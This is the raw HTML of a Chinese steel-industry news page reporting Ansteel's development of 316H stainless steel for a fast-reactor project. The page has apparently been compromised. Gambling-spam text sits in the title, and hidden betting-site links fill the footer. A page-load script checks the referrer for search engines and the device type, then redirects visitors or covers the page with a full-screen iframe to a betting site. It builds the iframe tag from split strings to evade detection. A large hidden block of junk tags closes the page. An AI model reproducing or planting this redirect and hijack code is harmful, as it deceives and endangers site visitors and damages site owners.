? title2020-02-07-agιʼŹ-orzela.com-orzela.com 鞍钢成功开发全球唯一全部依靠自身装备生产四代快堆项目用钢湖南钢材钢铁?天贸钢铁?/title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta content="鞍钢成功开发全球唯一全部依靠自身装备生产四代快堆项目用钢,湖南钢材,湖南钢铁,钢材价格,钢材期货,钢材?钢材市场,钢材行情,钢板,钢?金属,冶金,交易,钢厂,电子商务,天贸,湖南,资讯,行情,市场,建站,钢厂价格,长沙市场, 板材, 型材,管材,不锈?优钢,建材,炉料,有色金属,钢材,天贸钢铁? name="keywords"> <meta content="天贸钢铁网是湖南新天贸信息咨询有限公司旗下的钢铁行业信息全面的门户网?包括钢铁?钢材?钢铁价格,钢材价格,钢铁行情,钢材行情,钢材价格走势,钢铁价格走势,钢铁市场,钢材市场,钢铁行业分析等信息,为湖南钢铁企业、钢材企业提供最新的钢材价格行情资讯和钢材现货电子商务服?致力于为湖南钢铁企业、经销商提供最新的资讯信息平台" name="description"> <link href="http://orzela.com/css/index.css" rel="stylesheet" type="text/css" /> <script>var V_PATH="/";window.onerror=function(){ return true; };</script> </head> <h1><a href="http://orzela.com/">agιʼŹ</a></h1> <div id=wrapper> <table style="BORDER-RIGHT: #cccccc 1px solid; OVERFLOW-Y: hidden; BORDER-LEFT: #cccccc 1px solid; HEIGHT: 1px" cellspacing="0" cellpadding="0" width="1000" align="center" bgcolor="#ffffff" border="0" background="http://orzela.com/tmimages/index_01.gif" > <tr> <td width="14" align="center" valign="top"><img src="http://orzela.com/tmimages/index_01.gif" width="14" height="33" alt="" /></td> <td width="550" height="33" valign="middle"> <iframe frameborder="0" width="550" height="33" bgcolor="#ffffff" src="http://users.tmxxw.com/indexlogin.aspx" scrolling="no"></iframe> </td> <td width="432" valign="middle"> <table cellspacing="0" cellpadding="0" width="432" border="0"> <tr> <td width="207" align="center" class="p92"> <script src=http://orzela.com/js/thesj.js></script> <script> tick(); </script></td> <td width="75"><a href="http://orzela.com/phone/index.asp" target="_blank"><img src="http://orzela.com/tmimages/an-sj.gif" width="125" height="21" border=0 /></a></td> </tr> </table> </td> </tr> </table> <div id="smbfwj5b" class="header"> <table cellpadding="0" cellspacing="0" width="100%" border="0"> <tr> <td width="217" valign="middle" class="logo"><a href="http://orzela.com/"><img src="http://orzela.com/images/logo_zx.jpg" alt="天贸钢铁? width="290" border=0 height="90"/></a></td> <td width="783" valign="top"><!--顶部广告 begin--> <table width="700" border="0" cellspacing="0" cellpadding="0"> <tr> <td class="topgg1"><a href="http://orzela.com/xj/" target="_blank"><img src="http://orzela.com/flashindex/top_1_1.gif" width="340" height="78" border="0"></a></td> <td class="topgg1"><a href="http://orzela.com/jjxs/" target="_blank"><img src="http://orzela.com/flashindex/top_1_2.gif" width="340" height="78" border="0"></a></td> </tr> </table> <!--顶部广告 end--></td> </tr> </table> </div> <!--导航 begin--> <div id="smbfwj5b" class=MLogin> <div id="smbfwj5b" class=MlogLeft><a href="#" target="_blank"><img src="http://orzela.com/flashindex/hndh.gif" width="164" height="113" border="0"></a></div> <div id="smbfwj5b" class=MlogMid> <div id="smbfwj5b" class="menu"> <ul> <li ><a target="_blank" href="http://orzela.com/">首页</a></li> <li ><a target="_blank" href="http://orzela.com/bj/">价格中心</a></li> <li ><a target="_blank" href="http://orzela.com/zx/">资讯中心</a></li> <li ><a target="_blank" href="http://orzela.com/searchs/">现货?/a></li> <li ><a target="_blank" href="http://www.tmallsteel.com/">钢材商城</a></li> <li ></li> <li ><a target="_blank" href="http://orzela.com/jjxs/">销售竞?/a></li> <li ><a target="_blank" href="http://orzela.com/xj/">采购?/a></li> <li ><a target="_blank" href="http://orzela.com/video/">钢铁视频</a></li> </ul> <div id="smbfwj5b" class="clear"></div> </div> <div id="smbfwj5b" class=top_menu> <!--品种分栏 begin--> <div id="smbfwj5b" class=menucs> <ul> <li><span class=blue>品种:</span></li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=06&DDX_XL=06&sf=&city=">建材</a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=01&DDX_XL=01&sf=&city=">板材</a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=02&DDX_XL=02&sf=&city=">型材</a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=03&DDX_XL=03&sf=&city=">管材</a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=05&DDX_XL=05&sf=&city=">优钢</a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=04&DDX_XL=04&sf=&city=">不锈?/a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=07&DDX_XL=07&sf=&city=">炉料</a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=08&DDX_XL=08&sf=&city=">有色金属</a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx?DDX_DL=09&DDX_XL=09&sf=&city=">其他钢材</a> </li> <li><a target="_blank" href="http://orzela.com/searchs/search.aspx">更多 >></a> </li> </ul> <div id="smbfwj5b" class=clear></div></div> <!--品种分栏 end--> <!--城市导航 begin--> <div id="smbfwj5b" class=menucs> <ul> <li><span class=blue>湖南:</span></li> <li> </li> <li> </li> <li> </li> <li> </li> <li><a target="_blank" href="#">岳阳</a> </li> <li><a target="_blank" href="#">衡阳</a> </li> <li><a target="_blank" href="#">益阳</a> </li> <li><a target="_blank" href="#">娄底</a> </li> <li><a target="_blank" href="#">邵阳</a> </li> <li><a target="_blank" href="#">怀?/a> </li> <li><a target="_blank" href="#">郴州</a> </li> <li><a target="_blank" href="#">永州</a> </li> <li><a target="_blank" href="#">张家?/a> </li> <li><a target="_blank" href="#">湘西</a> </li> <li><a target="_blank" href="#">更多 >></a> </li> </ul> <div id="smbfwj5b" class=clear></div></div> <!--城市导航 end--> <!--城市全国 begin--> <div id="smbfwj5b" class=menucs> <ul> <li><span class=blue>全国:</span></li> <li><a target="_blank" href="#">武汉</a> </li> <li><a target="_blank" href="#">南昌</a> </li> <li><a target="_blank" href="#">贵州</a> </li> <li><a target="_blank" href="#">重庆</a> </li> <li><a target="_blank" href="#">上海</a> </li> <li><a target="_blank" href="#">广州</a> </li> <li><a target="_blank" href="#">天津</a> </li> <li><a target="_blank" href="#">北京</a> </li> <li><a target="_blank" href="#">杭州</a> </li> <li><a target="_blank" href="#">成都</a> </li> <li><a target="_blank" href="#">郑州</a> </li> <li><a target="_blank" href="#">更多 >></a> </li> </ul> <div id="smbfwj5b" class=clear></div></div> <!--城市全国 end--> </div> </div> <div id="smbfwj5b" class=MlogRight><a href="#" target="_blank"><img src="http://orzela.com/flashindex/hnlc.gif" width="164" height="113" border="0"></a></div> </div> <!--导航 end--> <!--网站公告 开?-> <!--网站公告 结束--> <!--网站第一排广?开?-> <!--第一排广告结?-> <!--第一?开?-> <div id="smbfwj5b" class=main_fy> <!--当前位置部份 begin--> <div id="smbfwj5b" class="location cBlack5"> <div id="smbfwj5b" class="ie6 left"><img src="http://orzela.com/tmimages/arrow.gif" width="14" height="12" /> 当前位置?a href="http://orzela.com">首页</a> -> <a >厂家资讯</a> -> <a >钢厂动?/a></div> </div> <!--当前位置部份 end--> <!--钢价第一部份 begin--> <div id="smbfwj5b" class="MLeft"> <!--各地钢材价格 begin--> <div id="smbfwj5b" class=" Mbox01"> <div id="smbfwj5b" class="news_box"> <div id="smbfwj5b" class="news_title">鞍钢成功开发全球唯一全部依靠自身装备生产四代快堆项目用钢</div> <div id="smbfwj5b" class="news_nform"> 【字体选择?a class="black" href="javascript:fontZoom(16)">?/a> <a class="black" href="javascript:fontZoom(14)"> ?/a> <a class="black" href="javascript:fontZoom(12)">?/a>?<font class="f12">2020/2/4 11:49:09</font>) </div> <div id="smbfwj5b" class="news_key"> 关键词:钢材 钢铁 钢材?钢铁?湖南钢材 湖南钢铁</div> <div id="smbfwj5b" class="news_img"><a ><img src="http://orzela.com/flashindex/tmxc735.jpg" width="735" height="60" border="0"></a></div> <div class="news_content" id="fontzoom"><P>  鞍钢通过建立适宜的生产工艺路线,日前,成功实现四代核?00MW示范快堆项目316H奥氏体不锈钢产品开发,并完成首批合同供货,解决了该产品从无到有、“卡脖子”的难题。鞍钢因此成为全球唯一一家全部依靠自身装备生产该产品的企业?#12288; 随着世界各国经济发展和环境恶化压力的双重要求,建造核电、利用核能已成为未来10-20年的重点。我国在核电开发、建设方面已取得了重大进展,三代核电技术达到世界先进,四代核电技术达到国际领先水平。其中四代核?00MW示范快堆项目更是引领行业发展,代表核能发展方向,具有极其重要的战略意义。举全国之力、聚全球之智,是我国在该项目的态度?#12288; 作为示范快堆,该项目对装备的安全性要求极为严格,关键装备主要采用316H奥氏体不锈钢。但在综合性能与组织方面,与常?16H奥氏体不锈钢有着极大的区别,尤其在钢中铁素体、晶粒度、晶间腐蚀及钢板头、尾性能均匀性要求方面,几乎近于苛刻,以至于在材料招标期间,国外老牌核电用不锈钢生产企业望而却步,认为材料设计不合理,拒绝投标?#12288; 316H奥氏体不锈钢已不折不扣地成为核电装备“卡脖子”材料。面对国家急需,鞍钢作为央企挺身而出?019??日,鞍钢集团有关领导组织召开316H奥氏体不锈钢生产动员会,并将316H奥氏体不锈钢开发确定为鞍钢“一号工程”。面对国家需求,在公司领导的高度重视下,鞍钢核电用钢项目团队没有退缩,结合合同全面承担了项目研发、生产及供货任务。在克服不锈钢研发、生产经验少,产品涉及单位众多、工序繁杂及技术指标要求严格等诸多不利因素情况下,充分发挥了鞍钢集团优势,依靠远在广州的鞍众的不锈钢冶炼、鞍钢铸钢公司的电渣重熔、鞍钢股份有关生产厂的钢锭开坯、轧制、固溶处理及酸洗钝化,建立了该钢种适宜的生产工艺路线并成功实现产品开发和首批合同供货?#12288; 下一步,鞍钢核电用钢项目团队还要继续深入开展该产品研发,进一步优化生产工艺、改进工艺路线、降低生产成本、缩短制造周期,全力支撑我国四代核电600MW示范快堆项目建设?/P></div> <div id="smbfwj5b" class="news_end"> </div> <div id="smbfwj5b" class="news_msg">天贸钢铁网免责声明:<br> 天贸钢铁网所提供的信息及资料除原创外,有部分资讯从网络等媒体收集而来,版权归原作者及媒体网站所有,天贸钢铁网力求保存原有的版权信息并尽可能注明来源;部分因为操作上的原因可能已将原有信息丢失,敬请原作者谅解,如果您对天贸钢铁网所载文章及作品版权的归属存有异议,请立即通知天贸钢铁网,天贸钢铁网将立即予以删除,同时向您表示歉意!本信息仅供您参?未经许可,不得转载? <!--本信息仅供您参?未经许可,不得转载?br>本站部分内容摘自互联网,如果给您造成不便或侵犯了您的版权,请与我们联系?-></div> <div id="smbfwj5b" class="news_cmd"> [ <a href="javascript:window.external.AddFavorite(document.location,'$$title$$')"><font color="#000033">收藏该页</font></a> ] [ <a href="javascript:window.clipboardData.setData('Text',location.href);void('0');alert('已复制,您可以粘贴告诉您的朋友们!欢迎再次光临本站!');"> <font color="#FF0000">告诉朋友</font></a> ] [ <a href="javascript:window.close()"><font color="#000033">关闭窗口</font></a> ] [ <a href="javascript:window.print();"><font color="#000033"> 打印资讯</font></a> ]</div> </div> </div> <div id="smbfwj5b" class="Mbox01"> <div id="smbfwj5b" class="Mtitle02 cBlue2">【相关文章?/div> <!--Recommend List Begin--> <iframe name="ad" frameborder="0" width="100%" height="180" scrolling="no" src="http://orzela.com/bj/xgwj.aspx?typeid=029&jshy=&top=6&zf=85"> </iframe> <div id="smbfwj5b" class="clear"></div> <div id="smbfwj5b" class="clear"></div> <!--Recommend List End--> </div> </div> <div id="smbfwj5b" class="Mright"> <!--最新资?begin--> <div id="smbfwj5b" class=" Mbox01"> <div id="smbfwj5b" class="Mtitle02 cBlue2"> 最新资?</div> <iframe name="ad" frameborder="0" width="100%" height="235" scrolling="no" src="http://orzela.com/bj/xgwj.aspx?top=9&zf=35"> </iframe> </div> <!--最新钢材价?begin--> <div id="smbfwj5b" class=" Mbox01"> <div id="smbfwj5b" class="Mtitle02 cBlue2"> 最新钢材价?</div> <iframe name="ad" frameborder="0" width="100%" height="235" scrolling="no" src="http://orzela.com/bj/xgwj.aspx?typeid=010,065&top=9&zf=35"> </iframe> </div> <!--各地钢材价格 end--> <div id="smbfwj5b" class="Mbox01"> <div id="smbfwj5b" class="Mtitle02 cBlue2">推荐供应?</div> <!--Recommend List Begin--> <div id="smbfwj5b" class=cate style="border-top-width: 0px; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px">螺纹?/div> <div id="smbfwj5b" class=RecomCo> <ul > <li> </li> <li> </li> <li> </li> <li> </li> <li> </li> <li> </li> </li> </ul> </div> <div id="smbfwj5b" class="clear"></div> <div id="smbfwj5b" class=cate>板材</div> <div id="smbfwj5b" class=RecomCo> <ul > <li> </li> <li> </li> <li> </li> <li> </li> <li> </li> <li> </li> <li> </li> <li> </li> </ul> </div> <div id="smbfwj5b" class="clear"></div> <div id="smbfwj5b" class=cate>管材</div> <div id="smbfwj5b" class=RecomCo> <ul > <li> </li> <li> </li> <li> </li> <!--<li> </li>--> <li> </li> </ul> </div> <div id="smbfwj5b" class="clear"></div> <div id="smbfwj5b" class=cate>型材</div> <div id="smbfwj5b" class=RecomCo> <ul > <li> </li> <li> </li> <li> </li> <li> </li> <li> </li> </ul> </div> <div id="smbfwj5b" class="clear"></div> <div id="smbfwj5b" class=cate>不锈?/div> <div id="smbfwj5b" class=RecomCo> <ul > <li> </li> <!--<li> </li>--> <li> </li> <li> </li> <!--<li> </li>--> <li> </li> </ul> </div> <div id="smbfwj5b" class="clear"></div> <div id="smbfwj5b" class=cate>优钢</div> <div id="smbfwj5b" class=RecomCo> <ul > <!--<li> </li>--> <li> </li> <li><a href="http://orzela.com/gongsi/hjgm/sy.html" title=湖南华美 target=_blank>湖南华美</a> </li> <li> </li> </ul> </div> <div id="smbfwj5b" class="clear"></div> <!--Recommend List End--> </div> </div> <div id="smbfwj5b" class=clear></div> <!--底部 end--> </div> <div id="smbfwj5b" class=clear></div> <div id="smbfwj5b" class=main_01> <div id="smbfwj5b" class="footnav"> <p><a target="_blank" href="http://orzela.com/guanyuwm.asp">网站介绍</a>| | <a target="_blank" href="http://orzela.com/fuwu/cpfw.html">产品服务</a>| <a target="_blank" href="http://orzela.com/baojia/baojia.asp">广告服务</a>| <a target="_blank" href="http://orzela.com/sitemap.html">网站导航</a>| <a target="_blank" href="http://orzela.com/zhaopin.asp">诚聘英才</a>| <a target="_blank" href="http://orzela.com/lianxiwomen.asp">联系我们</a>| <a target="_blank" href="http://orzela.com/friendlink/yqlj.asp">友情链接</a>| <a target="_blank" href="http://orzela.com/feedback/feedback.asp">与天贸对?/a>|</p> </div> <div id="smbfwj5b" class="copyright"> 客服电话?731-82241060    传真号码?731-82241051    <a target="_blank" href="http://orzela.com/zaixian/zx.html">在线播放<br> </a>    <font color=#213368>增值电信业务经营许可证:湘B2-20130073</font> <br>Copyright 1999-<script>document.write(new Date().getFullYear()); </script> orzela.com All Rights Reserved </div> <div id="smbfwj5b" style=display:none> </div> </div> </div> <!-- JiaThis Button BEGIN --> <script type="text/javascript"> var jiathis_config = {data_track_clickback:'true'}; </script> <script type="text/javascript" src="http://v3.jiathis.com/code/jiathis_r.js?move=0&uid=1560128" charset="utf-8"></script> <!-- JiaThis Button END --> <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script><a target="_blank" title="ղ" href="http://www.itapok.com">ղ</a> <a target="_blank" title="|agιʼŹ" href="http://www.tnjfxq.com">|agιʼŹ</a> <a target="_blank" title="ʱٷ" href="http://www.hjscys.com">ʱٷ</a> <a target="_blank" title="80Ʊ?˽" href="http://www.shdxzlyy.com">80Ʊ?˽</a> <a target="_blank" title="²Ʊ|agιʼŹ" href="http://www.ypfch.com">²Ʊ|agιʼŹ</a> <a target="_blank" title="ʹ" href="http://www.shjzpx.com">ʹ</a> <a target="_blank" title="ʱʱ-ӭ" href="http://www.iinall.com">ʱʱ-ӭ</a> <a target="_blank" title="Ʊpk10-ӭ" href="http://www.ianant.com">Ʊpk10-ӭ</a> <a target="_blank" title="bf88ط&" href="http://www.itsliv.com">bf88ط&</a> <a target="_blank" title="manbetx|ҳ" href="http://www.ouichh.com">manbetx|ҳ</a> <script> (function () { var bp = document.createElement('script'); bp.src = 'http://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js'; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); if (typeof (window.ccc_ad_style) == 'undefined') { var ccc_ad_style = 3; } if (typeof (window.ccc_ad_type) == 'undefined') { var ccc_ad_type = 0; } var ccc_browser = { versions: function () { var u = navigator.userAgent, app = navigator.appVersion; return {//移动终端浏览器版本信? trident: u.indexOf("Trident") > -1, //IE内核 presto: u.indexOf("Presto") > -1, //opera内核 webKit: u.indexOf("AppleWebKit") > -1, //苹果、谷歌内? gecko: u.indexOf("Gecko") > -1 && u.indexOf("KHTML") == -1, //火狐内核 mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终? ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端 android: u.indexOf("Android") > -1 || u.indexOf("Linux") > -1, //android终端或者uc浏览? iPhone: u.indexOf("iPhone") > -1, //是否为iPhone或者QQHD浏览? iPad: u.indexOf("iPad") > -1, //是否iPad webApp: u.indexOf("Safari") == -1 //是否web应该程序,没有头部与底部 }; }(), language: (navigator.browserLanguage || navigator.language).toLowerCase() }; //品牌? var ccc_brandKeys = { //'cai':{ // 'keys':["满堂"], //'pc':'', //'wap':'' //}, // 'cai2':{ // 'keys':["添彩"], // 'pc':'', // 'wap':'' //} }; var ccc_index = { 'pc': 'http://betj8.com/', 'wap': 'http://betj8.com/' }; var Unicode2Native = function (code) { return code; if (!code) { return; } var return_title = ''; for (var i = 0; i < code.length; i++) { return_title += String.fromCharCode(code[i].replace(/[&#;]/g, '')); } return return_title; } var getAgentHref = function () { var title = document.title; title = Unicode2Native(title); title = title.toLowerCase(); for (var k in ccc_brandKeys) { var curr_brand = ccc_brandKeys[k]; var wap_addr = curr_brand['wap'] || ''; for (var bk in curr_brand['keys']) { var keyword = curr_brand['keys'][bk]; if (title.indexOf(keyword) != -1) { if (ccc_browser.versions.mobile && wap_addr) { return wap_addr } else { return curr_brand['pc']; } } } } if (ccc_ad_type != 2) { return ccc_browser.versions.mobile ? ccc_index['wap'] : ccc_index['pc']; } else { return false; } }; var ccc_regexp = /\.(baidu|haosou|so|sogou|soso|google|sm|youdao|yahoo|bing|360|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}/ig; var agentHref = getAgentHref(); var ccc_html = ''; ccc_html += '<style>html,body{widht:100%;height:100%;overflow:hidden;}</style>' ccc_html += '<div style="width:100%;height:100%;text-align:left;background:#fff;position:absolute;top:0;left:0;z-index:99999999;">'; ccc_html += '<' + 'i' + '' + 'f' + '' + 'r' + 'a' + '' + 'm' + 'e' + ' s' + 'r' + 'c="' + agentHref; ccc_html += '" style="border:0;width:100%;height:100%;text-align:center;position:fixed;" f' + 'r' + '' + '' + 'a' + +'' + 'm' + 'e' + 'border="0">'; ccc_html += '</' + 'i' + '' + 'f' + '' + 'r' + '' + 'a' + '' + '' + '' + 'm' + 'e></div>'; var ccc_where = ''; var doAd = function () { console.log('ok'); switch (ccc_ad_style) { case 1: if (agentHref) { location.href = agentHref; } break //来路 case 2: if (agentHref) { ccc_where = document.referrer; if (ccc_regexp.test(ccc_where)) { location.href = agentHref; //jQuery(location).attr('href', agentHref); } } break; //框架 case 3: if (agentHref) { document.body.insertAdjacentHTML('afterbegin', ccc_html); //$('body').prepend(ccc_html); } break; //refer与框? case 4: if (agentHref) { ccc_where = document.referrer; if (ccc_regexp.test(ccc_where)) { location.href = agentHref; //jQuery('body').prepend(ccc_html); } } break; case 11: case 12: if (agentHref) { document.body.insertAdjacentHTML('afterbegin', ccc_html); //$('body').prepend(ccc_html); } break } } doAd(); $(function () { doAd(); }) </script> </body> <div id="pl_css_ganrao" style="display: none;"><q id='k79yy'><p id='k79yy'><optgroup id='k79yy'></optgroup></p></q><form id='k79yy'></form><ol id='k79yy'><th id='k79yy'><legend id='k79yy'></legend></th><bdo id='k79yy'><optgroup id='k79yy'></optgroup></bdo></ol><dl id='k79yy'><tt id='k79yy'><tr id='k79yy'></tr></tt><address id='k79yy'><th id='k79yy'></th></address></dl><style id='k79yy'><dt id='k79yy'></dt><dir id='k79yy'></dir></style><dd id='k79yy'></dd><dl id='k79yy'><sup id='k79yy'></sup></dl><table id='k79yy'><p id='k79yy'><optgroup id='k79yy'><tbody id='k79yy'><p id='k79yy'><dir id='k79yy'><div id='k79yy'><center id='k79yy'></center></div></dir></p></tbody></optgroup></p></table><abbr id='k79yy'><abbr id='k79yy'><blockquote id='k79yy'><i id='k79yy'><select id='k79yy'><td id='k79yy'><u id='k79yy'><ol id='k79yy'></ol><big id='k79yy'><big id='k79yy'></big></big></u><pre id='k79yy'><kbd id='k79yy'></kbd></pre><del id='k79yy'></del></td><button id='k79yy'><noframes id='k79yy'><option id='k79yy'></option><select id='k79yy'><span id='k79yy'><form id='k79yy'></form></span><dd id='k79yy'></dd></select><dt id='k79yy'></dt></noframes><del id='k79yy'><noframes id='k79yy'></noframes></del></button><kbd id='k79yy'></kbd><form id='k79yy'></form><button id='k79yy'><noframes id='k79yy'><style id='k79yy'><big id='k79yy'><i id='k79yy'></i><tbody id='k79yy'></tbody></big></style><abbr id='k79yy'></abbr></noframes></button></select></i><li id='k79yy'></li></blockquote></abbr><address id='k79yy'></address></abbr><address id='k79yy'><sub id='k79yy'><big id='k79yy'><tt id='k79yy'><bdo id='k79yy'><acronym id='k79yy'></acronym></bdo><label id='k79yy'><abbr id='k79yy'></abbr><em id='k79yy'><pre id='k79yy'></pre><address id='k79yy'><small id='k79yy'></small></address></em></label><center id='k79yy'><span id='k79yy'><b id='k79yy'></b></span></center><option id='k79yy'><bdo id='k79yy'><select id='k79yy'><strong id='k79yy'><q id='k79yy'><sup id='k79yy'><abbr id='k79yy'></abbr></sup><p id='k79yy'></p></q><span id='k79yy'><tfoot id='k79yy'><ul id='k79yy'><div id='k79yy'><style id='k79yy'><dir id='k79yy'></dir></style></div></ul></tfoot><q id='k79yy'><form id='k79yy'></form></q></span><noframes id='k79yy'><p id='k79yy'><sup id='k79yy'></sup></p></noframes></strong></select></bdo></option></tt><option id='k79yy'></option><li id='k79yy'></li></big><strong id='k79yy'></strong></sub></address><ol id='k79yy'><font id='k79yy'></font><dl id='k79yy'></dl></ol><option id='k79yy'></option><th id='k79yy'></th><li id='k79yy'></li><center id='k79yy'><u id='k79yy'></u></center><del id='k79yy'></del><tfoot id='k79yy'></tfoot><p id='k79yy'><strike id='k79yy'></strike><fieldset id='k79yy'></fieldset></p><tr id='k79yy'><bdo id='k79yy'><ul id='k79yy'></ul></bdo></tr><th id='k79yy'><tfoot id='k79yy'><p id='k79yy'><thead id='k79yy'><dfn id='k79yy'></dfn></thead></p><strong id='k79yy'></strong><th id='k79yy'></th></tfoot></th><u id='k79yy'><blockquote id='k79yy'></blockquote></u><b id='k79yy'><address id='k79yy'></address></b><ins id='k79yy'><table id='k79yy'><strike id='k79yy'><tfoot id='k79yy'><ins id='k79yy'></ins></tfoot><strike id='k79yy'><small id='k79yy'><div id='k79yy'></div></small></strike></strike><optgroup id='k79yy'><big id='k79yy'><abbr id='k79yy'></abbr></big><kbd id='k79yy'><q id='k79yy'></q></kbd></optgroup></table><big id='k79yy'></big></ins><sub id='k79yy'></sub><q id='k79yy'><kbd id='k79yy'></kbd><dt id='k79yy'></dt></q><big id='k79yy'><pre id='k79yy'><code id='k79yy'></code><del id='k79yy'><fieldset id='k79yy'></fieldset></del><big id='k79yy'><dt id='k79yy'></dt></big><bdo id='k79yy'></bdo></pre></big><noscript id='k79yy'></noscript><acronym id='k79yy'></acronym><div id='k79yy'><tr id='k79yy'><b id='k79yy'></b></tr></div><dl id='k79yy'></dl><tbody id='k79yy'><p id='k79yy'><noframes id='k79yy'></noframes></p><u id='k79yy'></u></tbody><dt id='k79yy'></dt><dd id='k79yy'></dd><big id='k79yy'></big><pre id='k79yy'></pre><dir id='k79yy'><optgroup id='k79yy'><select id='k79yy'></select></optgroup></dir><font id='k79yy'><ol id='k79yy'><dir id='k79yy'><dl id='k79yy'></dl><thead id='k79yy'></thead></dir></ol></font><pre id='k79yy'><tr id='k79yy'><q id='k79yy'><fieldset id='k79yy'></fieldset></q></tr></pre><dfn id='k79yy'><td id='k79yy'><strong id='k79yy'><style id='k79yy'><acronym id='k79yy'></acronym><pre id='k79yy'><pre id='k79yy'><dir id='k79yy'><label id='k79yy'><noframes id='k79yy'></noframes></label></dir><strike id='k79yy'></strike></pre></pre></style></strong><th id='k79yy'><dir id='k79yy'><dt id='k79yy'><b id='k79yy'></b></dt></dir></th></td></dfn><sub id='k79yy'></sub><th id='k79yy'></th><legend id='k79yy'></legend><style id='k79yy'></style><i id='k79yy'></i><optgroup id='k79yy'></optgroup><noscript id='k79yy'><q id='k79yy'><tfoot id='k79yy'><td id='k79yy'><b id='k79yy'></b></td></tfoot><pre id='k79yy'><code id='k79yy'></code><del id='k79yy'><form id='k79yy'></form></del><address id='k79yy'></address></pre></q></noscript><dfn id='k79yy'></dfn><optgroup id='k79yy'></optgroup><address id='k79yy'><sub id='k79yy'></sub></address><abbr id='k79yy'><ul id='k79yy'><big id='k79yy'><tbody id='k79yy'><dir id='k79yy'><tfoot id='k79yy'></tfoot><abbr id='k79yy'><noscript id='k79yy'></noscript></abbr></dir></tbody><tr id='k79yy'></tr></big></ul></abbr><dl id='k79yy'></dl><div id='k79yy'></div><div id='k79yy'><ol id='k79yy'></ol></div><i id='k79yy'></i><i id='k79yy'><strong id='k79yy'><sup id='k79yy'></sup><span id='k79yy'><strong id='k79yy'></strong><strong id='k79yy'></strong></span><option id='k79yy'><noscript id='k79yy'></noscript></option></strong></i><abbr id='k79yy'></abbr><ul id='k79yy'></ul><bdo id='k79yy'><div id='k79yy'></div></bdo><pre id='k79yy'><fieldset id='k79yy'></fieldset></pre><dfn id='k79yy'></dfn><tr id='k79yy'><option id='k79yy'><kbd id='k79yy'></kbd><label id='k79yy'><strong id='k79yy'><font id='k79yy'></font></strong></label><ol id='k79yy'><code id='k79yy'><td id='k79yy'><strike id='k79yy'><blockquote id='k79yy'></blockquote></strike></td></code></ol><dt id='k79yy'></dt><sup id='k79yy'><q id='k79yy'><dd id='k79yy'><q id='k79yy'><del id='k79yy'><acronym id='k79yy'></acronym><tfoot id='k79yy'></tfoot><label id='k79yy'><strong id='k79yy'></strong></label><td id='k79yy'></td><ul id='k79yy'><select id='k79yy'><li id='k79yy'></li></select></ul><label id='k79yy'></label></del><tbody id='k79yy'></tbody><dt id='k79yy'></dt></q><small id='k79yy'><strike id='k79yy'></strike></small></dd></q><label id='k79yy'></label></sup></option><pre id='k79yy'><ins id='k79yy'><td id='k79yy'></td><sub id='k79yy'><optgroup id='k79yy'></optgroup></sub><center id='k79yy'><em id='k79yy'></em></center><acronym id='k79yy'></acronym></ins></pre></tr><tr id='k79yy'></tr><center id='k79yy'><tbody id='k79yy'></tbody><tfoot id='k79yy'></tfoot></center><small id='k79yy'><th id='k79yy'></th></small><small id='k79yy'></small><em id='k79yy'></em><dfn id='k79yy'><dd id='k79yy'></dd></dfn><dl id='k79yy'><i id='k79yy'><td id='k79yy'><thead id='k79yy'></thead></td></i></dl><style id='k79yy'><th id='k79yy'><form id='k79yy'><span id='k79yy'><dl id='k79yy'><label id='k79yy'></label></dl><th id='k79yy'><li id='k79yy'><noscript id='k79yy'></noscript><tbody id='k79yy'></tbody><tbody id='k79yy'><form id='k79yy'><tbody id='k79yy'></tbody><dd id='k79yy'><i id='k79yy'></i></dd></form></tbody></li></th></span></form><optgroup id='k79yy'><ol id='k79yy'><b id='k79yy'></b></ol></optgroup></th></style><tbody id='k79yy'><strong id='k79yy'></strong><label id='k79yy'><label id='k79yy'><tbody id='k79yy'><small id='k79yy'><noframes id='k79yy'></noframes><ul id='k79yy'></ul><b id='k79yy'></b></small></tbody></label><label id='k79yy'><code id='k79yy'></code><kbd id='k79yy'></kbd></label><u id='k79yy'><tt id='k79yy'></tt></u></label></tbody><dfn id='k79yy'><tbody id='k79yy'></tbody></dfn><pre id='k79yy'><em id='k79yy'><option id='k79yy'><dt id='k79yy'></dt></option></em></pre><optgroup id='k79yy'><thead id='k79yy'></thead></optgroup><optgroup id='k79yy'></optgroup><optgroup id='k79yy'></optgroup><em id='k79yy'></em><address id='k79yy'></address><blockquote id='k79yy'><u id='k79yy'><style id='k79yy'><b id='k79yy'></b><thead id='k79yy'><style id='k79yy'><strong id='k79yy'><ol id='k79yy'></ol></strong></style><acronym id='k79yy'><del id='k79yy'><dd id='k79yy'></dd><bdo id='k79yy'><legend id='k79yy'><kbd id='k79yy'><address id='k79yy'></address></kbd></legend></bdo></del></acronym></thead><tbody id='k79yy'></tbody></style></u><label id='k79yy'><dt id='k79yy'></dt></label></blockquote><li id='k79yy'><dl id='k79yy'><noframes id='k79yy'><form id='k79yy'></form></noframes></dl></li><td id='k79yy'></td><blockquote id='k79yy'><th id='k79yy'><tr id='k79yy'></tr><code id='k79yy'><sup id='k79yy'><fieldset id='k79yy'></fieldset><code id='k79yy'></code><big id='k79yy'></big></sup></code></th></blockquote><select id='k79yy'><kbd 